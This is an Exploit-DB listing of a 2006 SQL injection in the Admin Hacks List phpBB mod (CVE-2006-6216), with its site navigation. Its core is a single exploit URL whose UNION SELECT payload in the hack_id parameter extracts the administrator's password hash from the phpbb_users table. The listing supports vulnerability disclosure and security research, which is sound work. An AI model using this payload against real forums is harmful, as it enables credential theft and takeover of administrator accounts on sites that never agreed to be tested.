Hacks List phpBB Mod 1.21 - SQL Injection

EDB-ID:

2851

CVE:

2006-6216

EDB Verified:

Author:

the master

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2006-11-26

Vulnerable App:

########################################################################
#  Admin Hacks List  v1.20  Remote SQL Injection Vulnerability
# 
#  Download: http://www.nivisec.com
#
#  Found By: the master
#
########################################################################
#  exploit:
#
# http://[Target]/[Path]/admin/admin_hacks_list.php?mode=edit&hack_id=-99%20UNION%20SELECT%20null,null,user_password,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id=2&sid=AdminHash
#
# Greetz: str0ke , Dr Max Virus
########################################################################

# milw0rm.com [2006-11-26]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services